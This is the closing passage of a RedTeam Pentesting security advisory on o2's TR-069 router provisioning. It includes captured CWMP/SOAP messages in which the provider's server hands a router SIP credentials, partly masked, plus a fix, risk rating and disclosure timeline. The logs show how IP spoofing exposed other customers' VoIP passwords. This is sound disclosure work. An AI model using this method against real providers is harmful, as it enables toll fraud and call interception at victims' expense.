<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">393158490</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:InformResponse>  
<MaxEnvelopes>1</MaxEnvelopes>  
</cwmp:InformResponse>  
</soapenv:Body>  
</soapenv:Envelope>  
  
[msg20] CPE -> ACS B:  
---------------------  
  
[empty]  
  
[msg21] CPE <- ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">393158500</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:SetParameterValues>  
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[2]">  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>  
<Value xsi:type="xsd:string">  
20140908xxxxxx-0896D776FAA2-78.48.x.x  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.Capabilities.  
X_AVM-DE_UsePSTN  
</Name>  
<Value xsi:type="xsd:boolean">0</Value>  
</ParameterValueStruct>  
</ParameterList>  
<ParameterKey>39315850</ParameterKey>  
</cwmp:SetParameterValues>  
</soapenv:Body>  
</soapenv:Envelope>  
  
[msg22] CPE -> ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">393158500</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:SetParameterValuesResponse>  
<Status>0</Status>  
</cwmp:SetParameterValuesResponse>  
</soap:Body>  
</soap:Envelope>  
  
[msg23] CPE <- ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">393158501</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:SetParameterValues>  
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[13]">  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.Enable  
</Name>  
<Value xsi:type="xsd:string">Enabled</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.Line.1.Enable  
</Name>  
<Value xsi:type="xsd:string">Enabled</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.Line.1.SIP.X_AVM-DE_UseAuthUsername  
</Name>  
<Value xsi:type="xsd:boolean">0</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.Line.1.SIP.X_AVM-DE_CLIRType  
</Name>  
<Value xsi:type="xsd:int">5</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.PSTNFailOver  
</Name>  
<Value xsi:type="xsd:boolean">0</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.DTMFMethod  
</Name>  
<Value xsi:type="xsd:string">RFC2833</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.SIP.OutboundProxy  
</Name>  
<Value xsi:type="xsd:string">sip.alice-voip.de</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.SIP.UserAgentDomain  
</Name>  
<Value xsi:type="xsd:string">sip.alice-voip.de</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.SIP.RegistrarServer  
</Name>  
<Value xsi:type="xsd:string">sip.alice-voip.de</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.SIP.ProxyServer  
</Name>  
<Value xsi:type="xsd:string">sip.alice-voip.de</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.Line.1.SIP.AuthPassword  
</Name>  
<Value xsi:type="xsd:string">0241463xxxxxxxxx</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.Line.1.DirectoryNumber  
</Name>  
<Value xsi:type="xsd:string">463xxxxx</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.Line.1.SIP.AuthUserName  
</Name>  
<Value xsi:type="xsd:string">49241463xxxxx</Value>  
</ParameterValueStruct>  
</ParameterList>  
<ParameterKey>39315850</ParameterKey>  
</cwmp:SetParameterValues>  
</soapenv:Body>  
</soapenv:Envelope>  
  
[msg24] CPE -> ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">393158501</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:SetParameterValuesResponse>  
<Status>0</Status>  
</cwmp:SetParameterValuesResponse>  
</soap:Body>  
</soap:Envelope>  
  
[msg25] CPE <- ACS B:  
---------------------  
  
[empty]  
------------------------------------------------------------------------  
  
  
Workaround  
==========  
  
o2 implemented countermeasures that prevent attackers from spoofing a  
victim's IP address in CWMP messages. This prevents attackers from  
retrieving arbitrary o2 customers' VoIP credentials.  
  
  
Fix  
===  
  
The CPE needs to be properly authenticated when communicating with the  
ACS. One option of doing so would be to provide the password of the DSL  
connection. This password is already known to the CPE as it has been  
entered manually by the customer during the initial setup process.  
  
  
Security Risk  
=============  
  
This vulnerability allows the unauthorised usage of foreign VoIP  
telephone numbers. The victim will be charged with all costs resulting  
from fraudulent phone calls. Furthermore, an attacker may answer phone  
calls on behalf of the victim. Customers have no means of defending  
oneself from such an attack. Chances are that the attack will be  
noticed only by customers who regularly check their invoice. The  
vulnerability is therefore considered to pose a high risk.  
  
  
Timeline  
========  
  
2014-09-08 - Potential vulnerability discovered  
2014-09-20 - Vulnerability verified  
2014-10-17 - ISP was notified about the vulnerability  
2014-10-17 - ISP implemented first countermeasures  
2014-10-24 - ISP wants to investigate further  
2014-11-28 - ISP needs more time, depends on hardware manufacturer  
2015-01-23 - ISP is still investigating, wants to permanently solve the  
problem  
2015-03-31 - ISP is still working on the problem, asks for more time  
2015-06-12 - ISP wants to notify the proper German authorities about the  
problem first while working on a solution  
2015-06-18 - ISP notified German authorities (Bundesnetzagentur, BfDI,  
BSI)  
2016-01-08 - Advisory released  
  
  
References  
==========  
  
[0] https://www.iol.unh.edu/sites/default/files/knowledgebase/hnc/TR-069_Crash_Course.pdf  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen  
`